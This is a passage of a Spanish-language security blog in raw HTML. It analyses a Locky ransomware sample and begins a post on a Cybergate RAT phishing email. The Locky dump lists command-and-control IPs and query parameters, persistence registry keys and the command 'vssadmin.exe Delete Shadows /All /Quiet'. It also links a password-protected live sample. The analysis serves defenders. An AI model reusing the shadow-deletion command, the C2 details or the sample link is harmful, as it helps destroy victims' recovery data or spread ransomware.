<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgef1LYBuRfjr-7vOBfIlQogcWo6jmhiVy-ZzGu3k2cLT1w8_j4odzilZBAEeqVwOf4mBx9e75l4TKJfZ95_nZQuob6yhXesRRQEOU8Gd5ZhYiDT_fQ4-dJgObBEmoIX6Ird2mY0-4sqKw/s1600/02.jpg" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgef1LYBuRfjr-7vOBfIlQogcWo6jmhiVy-ZzGu3k2cLT1w8_j4odzilZBAEeqVwOf4mBx9e75l4TKJfZ95_nZQuob6yhXesRRQEOU8Gd5ZhYiDT_fQ4-dJgObBEmoIX6Ird2mY0-4sqKw/s1600/02.jpg" /></a></span></div>
<div style="text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjM-SL3628JdYQWHnYGe54FfvFzEFG-eGup-2TWoLC0GiB22IN0opp52Rv6X9mn0eSpVuumD-JBQrNllP7Rn3IP85tEnMUX9Q80jpg11xGGyzVlcFs4WLoBmhVRkFF67UEol1PhinZJICQ/s1600/01.jpg" imageanchor="1"><img border="0" height="392" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjM-SL3628JdYQWHnYGe54FfvFzEFG-eGup-2TWoLC0GiB22IN0opp52Rv6X9mn0eSpVuumD-JBQrNllP7Rn3IP85tEnMUX9Q80jpg11xGGyzVlcFs4WLoBmhVRkFF67UEol1PhinZJICQ/s640/01.jpg" width="640" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>String Interesantes</b></span></div>
<div style="text-align: left;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div style="text-align: left;">
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Text strings referenced in Dumped:.text</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Address Disassembly Text string</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004019CA MOV DWORD PTR SS:[EBP-4],Dumped.004138B4 ASCII "bad allocation"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00401B09 PUSH Dumped.004138D0 UNICODE "0123456789ABCDEF"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00401B78 PUSH Dumped.004138C4 UNICODE ".tmp"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00401D8D PUSH Dumped.004138D0 UNICODE "0123456789ABCDEF"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00401DF0 PUSH Dumped.004138F4 UNICODE ".locky"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040253B PUSH Dumped.00413928 ASCII "invalid string position"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040255A PUSH Dumped.00413918 ASCII "string too long"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00402607 PUSH Dumped.00413918 ASCII "string too long"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00402687 PUSH Dumped.00413918 ASCII "string too long"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00402763 PUSH Dumped.00413904 ASCII "vector<t> too long"</t></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00402832 PUSH Dumped.00413918 ASCII "string too long"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004028C4 PUSH Dumped.00413918 ASCII "string too long"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00402AE8 PUSH Dumped.00413928 ASCII "invalid string position"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00402B64 PUSH Dumped.00413928 ASCII "invalid string position"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00402D2E ASCII "L~",0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00402D85 PUSH Dumped.00413918 ASCII "string too long"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403174 PUSH Dumped.00413940 UNICODE "\_Locky_recover_instructions.txt"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040326D PUSH Dumped.004139BC ASCII "id="</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403281 PUSH Dumped.004139A8 ASCII "&act=stats&path="</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004032A8 PUSH Dumped.0041399C ASCII "&encrypted="</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004032D2 PUSH Dumped.00413990 ASCII "&failed="</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004032F9 PUSH Dumped.00413984 ASCII "&length="</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403575 MOV EDI,Dumped.004139C0 ASCII "Windows 2000"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403599 MOV EDI,Dumped.004139D0 ASCII "Windows XP"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004035A7 MOV EDI,Dumped.004139DC ASCII "Windows 2003"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004035B1 MOV EDI,Dumped.004139EC ASCII "Windows 2003 R2"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004035D3 MOV EDI,Dumped.004139FC ASCII "Windows Vista"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004035DA MOV EDI,Dumped.00413A0C ASCII "Windows Server 2008"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004035EA MOV EDI,Dumped.00413A20 ASCII "Windows 7"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004035F1 MOV EDI,Dumped.00413A2C ASCII "Windows Server 2008 R2"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403602 MOV EDI,Dumped.00413A44 ASCII "Windows 8"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403609 MOV EDI,Dumped.00413A50 ASCII "Windows Server 2012"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040361A MOV EDI,Dumped.00413A64 ASCII "Windows 8.1"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403621 MOV EDI,Dumped.00413A70 ASCII "Windows Server 2012 R2"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040363E MOV EDI,Dumped.00413A88 ASCII "Windows 10"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403645 MOV EDI,Dumped.00413A94 ASCII "Windows Server 2016 Technical Preview"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040364C MOV EDI,Dumped.00413ABC ASCII "unknown"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004036C5 PUSH Dumped.00413CF4 ASCII "IsWow64Process"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004036CA PUSH Dumped.00413CE4 ASCII "kernel32.dll"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040376F PUSH Dumped.004139BC ASCII "id="</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040377E PUSH Dumped.00413AF4 ASCII "&act=getkey&affid="</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004037A5 PUSH Dumped.00413AEC ASCII "&lang="</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004037CB PUSH Dumped.00413AE4 ASCII "&corp="</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004037F7 PUSH Dumped.00413ADC ASCII "&serv="</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403820 PUSH Dumped.00413AD4 ASCII "&os="</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403847 PUSH Dumped.00413ACC ASCII "&sp="</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040386E PUSH Dumped.00413AC4 ASCII "&x64="</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403A33 PUSH Dumped.00413B08 ASCII "Tahoma"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403DB4 MOV DWORD PTR SS:[ESP],Dumped.00413940 UNICODE "\_Locky_recover_instructions.txt"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403DC5 PUSH Dumped.00413B10 UNICODE "\_Locky_recover_instructions.bmp"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403E75 PUSH Dumped.00413B54 ASCII "Control Panel\Desktop"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403F17 MOV ECX,Dumped.00413B70 ASCII "WallpaperStyle"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403F9B MOV ECX,Dumped.00413B80 ASCII "TileWallpaper"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00403FE6 MOV EDI,Dumped.00413B90 UNICODE "open"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004040A9 PUSH Dumped.00413CC4 ASCII "Wow64DisableWow64FsRedirection"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004040AE PUSH Dumped.00413CE4 ASCII "kernel32.dll"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004040DA MOV ESI,Dumped.004137EF ASCII "188.138.88.184,31.184.197.119,51.254.19.227,5.34.183.195,185.14.29.188"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004041E3 PUSH Dumped.00413B9C ASCII "Software\Locky"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040422D PUSH Dumped.00413BAC ASCII "id"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00404288 MOV EBX,Dumped.00413BB0 ASCII "pubkey"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004042E2 PUSH Dumped.00413BB8 ASCII "paytext"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00404355 PUSH Dumped.00413BC0 ASCII "completed"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004043ED PUSH Dumped.00413BCC UNICODE "svchost.exe"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040448A MOV ECX,Dumped.00413BAC ASCII "id"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004044E1 PUSH Dumped.00413BE4 UNICODE ":Zone.Identifier"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004045C6 PUSH Dumped.004139BC ASCII "id="</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004045DC PUSH Dumped.00413C08 ASCII "&act=gettext&lang="</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040468D PUSH Dumped.00413BB8 ASCII "paytext"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004047B5 PUSH Dumped.00413C20 UNICODE "vssadmin.exe Delete Shadows /All /Quiet"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004047E2 PUSH Dumped.00413C70 ASCII "Software\Microsoft\Windows\CurrentVersion\Run"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040486B PUSH Dumped.00413BC0 ASCII "completed"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004048AD PUSH Dumped.00413CAC ASCII "Locky"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00404993 PUSH Dumped.00413904 ASCII "vector<t> too long"</t></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00404A78 PUSH Dumped.00413904 ASCII "vector<t> too long"</t></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00404EE1 PUSH Dumped.00413CA0 UNICODE "Locky"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00404F81 PUSH Dumped.00413928 ASCII "invalid string position"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00404FA0 PUSH Dumped.00413918 ASCII "string too long"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00405041 PUSH Dumped.00413918 ASCII "string too long"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004050BB PUSH Dumped.00413918 ASCII "string too long"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004051B4 PUSH Dumped.00413918 ASCII "string too long"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00405409 PUSH Dumped.00413918 ASCII "string too long"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004055C2 PUSH Dumped.00413928 ASCII "invalid string position"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040563A PUSH Dumped.00413928 ASCII "invalid string position"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004057E6 PUSH Dumped.00413918 ASCII "string too long"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00405AAC MOV EDX,Dumped.00413CB4 UNICODE "/\"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00406393 MOV EDX,Dumped.00413CB4 UNICODE "/\"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004064A2 PUSH Dumped.00413D0C UNICODE "cmd.exe /C del /Q /F ""</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004064DE PUSH Dumped.00413D04 UNICODE "sys"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004069CA PUSH Dumped.00413D50 ASCII "HTTP/1.1"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004069D6 PUSH Dumped.00413D8C ASCII "POST"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004071D5 PUSH Dumped.00413D84 ASCII "http://"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004071E5 PUSH Dumped.00413D78 ASCII "/main.php"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040753F PUSH Dumped.00413904 ASCII "vector<t> too long"</t></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040759C PUSH Dumped.00413904 ASCII "vector<t> too long"</t></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040778B PUSH Dumped.00413918 ASCII "string too long"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004078CA PUSH Dumped.00413928 ASCII "invalid string position"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00407CBA PUSH Dumped.004147A0 UNICODE "\*"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004087B9 PUSH Dumped.00413904 ASCII "vector<t> too long"</t></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040880F PUSH Dumped.00413904 ASCII "vector<t> too long"</t></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00408866 PUSH Dumped.00413904 ASCII "vector<t> too long"</t></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004088C6 PUSH Dumped.00413904 ASCII "vector<t> too long"</t></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">004089C4 PUSH Dumped.00413904 ASCII "vector<t> too long"</t></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00408AC0 PUSH Dumped.00413904 ASCII "vector<t> too long"</t></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409CF7 MOV EAX,Dumped.00411344 ASCII "Unknown exception"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">00409E56 MOV DWORD PTR SS:[EBP-4],Dumped.004138B4 ASCII "bad allocation"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040AB74 CALL Dumped.0040D1F9 (Initial CPU selection)</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040ADAC PUSH Dumped.00411D44 UNICODE "Runtime Error!</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Program: "</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040ADED PUSH Dumped.00411D14 UNICODE "<program name="" unknown="">"</program></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040AE2E PUSH Dumped.00411D0C UNICODE "..."</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040AE43 PUSH Dumped.00411D04 UNICODE "</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040AE74 PUSH Dumped.00411CB8 UNICODE "Microsoft Visual C++ Runtime Library"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040B4F9 PUSH Dumped.00411D88 UNICODE "mscoree.dll"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040B508 PUSH Dumped.00411D78 ASCII "CorExitProcess"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040C47C PUSH Dumped.004120F0 UNICODE "KERNEL32.DLL"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040C6E9 PUSH Dumped.004120F0 UNICODE "KERNEL32.DLL"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040C70A PUSH Dumped.0041212C ASCII "FlsAlloc"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040C712 PUSH Dumped.00412120 ASCII "FlsGetValue"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040C71F PUSH Dumped.00412114 ASCII "FlsSetValue"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040C72C PUSH Dumped.0041210C ASCII "FlsFree"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040D7DD PUSH Dumped.004129E8 UNICODE "USER32.DLL"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040D7F8 PUSH Dumped.004129DC ASCII "MessageBoxW"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040D811 PUSH Dumped.004129CC ASCII "GetActiveWindow"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040D821 PUSH Dumped.004129B8 ASCII "GetLastActivePopup"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040D831 PUSH Dumped.0041299C ASCII "GetUserObjectInformationW"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040D84A PUSH Dumped.00412984 ASCII "GetProcessWindowStation"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">0040FD27 MOV DWORD PTR SS:[EBP+8],Dumped.004147BC ASCII "bad exception"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
</div>
<div style="text-align: left;">
<b style="font-family: Arial, Helvetica, sans-serif;">Archivos codificados con extension .locky</b></div>
<div style="text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_xhzom0psmKCAIgPphcOgVpv9rIQqvG74HVLZY4UTbGtIzvFzGzFiCxRtqr-ZT2N4CZIdwNzFNSevyKX_VMIaI-74TuRmvcWpU9w_fwOTTv3BtI2fpStlrGwS3NuyLmBAF-r3U3xP42c/s1600/04.jpg" imageanchor="1"><img border="0" height="271" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_xhzom0psmKCAIgPphcOgVpv9rIQqvG74HVLZY4UTbGtIzvFzGzFiCxRtqr-ZT2N4CZIdwNzFNSevyKX_VMIaI-74TuRmvcWpU9w_fwOTTv3BtI2fpStlrGwS3NuyLmBAF-r3U3xP42c/s400/04.jpg" width="400" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span></div>
<div style="text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span></div>
<div style="text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Comunicación con el C&C</b></span></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMqq0KQzsKPLNAEdFSq-JEHzF-rAGc-F_6zo0jVjxjO7ij1fdSUkWi1kZPSJWUDKXphEouPO9o2w99y04HGmOX95XiPzl2LELrX6DnfninWh8XQ9dyLr6iNT2NWoKYWRyUaOE8hgFgupg/s1600/06.jpg" imageanchor="1"><img border="0" height="420" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMqq0KQzsKPLNAEdFSq-JEHzF-rAGc-F_6zo0jVjxjO7ij1fdSUkWi1kZPSJWUDKXphEouPO9o2w99y04HGmOX95XiPzl2LELrX6DnfninWh8XQ9dyLr6iNT2NWoKYWRyUaOE8hgFgupg/s640/06.jpg" width="640" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
E<span style="font-family: Arial, Helvetica, sans-serif;">l inesperado mensaje de que somos victimas de este maldito Ransomware.</span></div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_UOKdgBWB3EH0eWToiyY5r1ZpTiuvL4ldWrLKum-c6iVAirHIuI9GZXRADcsuYQPz2iFTSHnTKt2UqCmXlVEW0R4bKVdFUosC7KF1HRzjgVZTGR_HHnL2aYN_phjPX9lApyKQJCmy54o/s1600/05.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="205" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_UOKdgBWB3EH0eWToiyY5r1ZpTiuvL4ldWrLKum-c6iVAirHIuI9GZXRADcsuYQPz2iFTSHnTKt2UqCmXlVEW0R4bKVdFUosC7KF1HRzjgVZTGR_HHnL2aYN_phjPX9lApyKQJCmy54o/s320/05.jpg" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Si no tenemos BACKUP de nuestros archivos, estamos en el HORNO!!!!!</span></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_UOKdgBWB3EH0eWToiyY5r1ZpTiuvL4ldWrLKum-c6iVAirHIuI9GZXRADcsuYQPz2iFTSHnTKt2UqCmXlVEW0R4bKVdFUosC7KF1HRzjgVZTGR_HHnL2aYN_phjPX9lApyKQJCmy54o/s1600/05.jpg" imageanchor="1"></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1QD9F8BDaoLmpwBxUZJNHqYQaGNaOuMViiwUI6mXziG8DYT8bif8_ABaxKA1fMfp37t9UM_k2_9fK-xAAihl9_TExkUPZ6EAqRpfpAvhmaSIJBgjBkZkaGN9Q2kcXPrRmhgKx4zOV7J0/s1600/07.jpg" imageanchor="1"><img border="0" height="424" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1QD9F8BDaoLmpwBxUZJNHqYQaGNaOuMViiwUI6mXziG8DYT8bif8_ABaxKA1fMfp37t9UM_k2_9fK-xAAihl9_TExkUPZ6EAqRpfpAvhmaSIJBgjBkZkaGN9Q2kcXPrRmhgKx4zOV7J0/s640/07.jpg" width="640" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Muestra: https://www.dropbox.com/s/6jk38tqjxh2qmb1/Locky-2-03-16.zip?dl=0</span></div>
<div style="text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Pass= infected</span></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: left;">
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Eso es todo por el momento @Dkavalanche 2016</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
</div>
@Dkavalanchehttp://www.blogger.com/profile/05803700040566483414noreply@blogger.com0tag:blogger.com,1999:blog-4220472203730425546.post-81599698491621438612015-12-17T12:45:00.001-08:002015-12-17T15:51:39.210-08:00<b style="background-color: #fefdfa; color: #222222; font-family: Arial, Helvetica, sans-serif; font-size: 13px; line-height: 18.2px;">Campaña RAT Cybergate Falso correo:</b><br />
<h2 class="rmSubject" style="margin: 0px 0px 13px; padding-top: 2px;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: small;"><span style="color: #444444;"><span style="font-weight: normal; line-height: 29.9904px;">"Hola todo el mundo lo sabe menos tu te están engañando abre los ojos"</span></span></span></h2>
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: small;">Contiene tres links que descarga un ejecutable con el icono de adobe flash.</span></div>
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: small;"></span><br />
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: small;">http://urlquery.net/report.php?id=1450312796496</span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: small;">
<div>
http://urlquery.net/report.php?id=1450312974084</div>
<div>
<br /></div>
</span></div>
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: small;"><br /></span></div>
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgADg-6vg23r2HeuT343KYQ6L__mI5PrN4HoGjBJ0cOHiESNta4U5dE_uag0BIatyQd09kVX_e-upfnBzIrbLPzIg6yGkFVFSQy4fjZC7S90-WoSTl0Ov-IwHyWEnDqoJuRrc7sXHv6g9M/s1600/fake.jpg" imageanchor="1"><img border="0" height="197" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgADg-6vg23r2HeuT343KYQ6L__mI5PrN4HoGjBJ0cOHiESNta4U5dE_uag0BIatyQd09kVX_e-upfnBzIrbLPzIg6yGkFVFSQy4fjZC7S90-WoSTl0Ov-IwHyWEnDqoJuRrc7sXHv6g9M/s640/fake.jpg" width="640" /></a></span></div>
<div>
<br /></div>
<div>
<br /></div>
<div style="text-align: center;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Icono</span></div>
<div>
<br /></div>
<div style="text-align: center;">
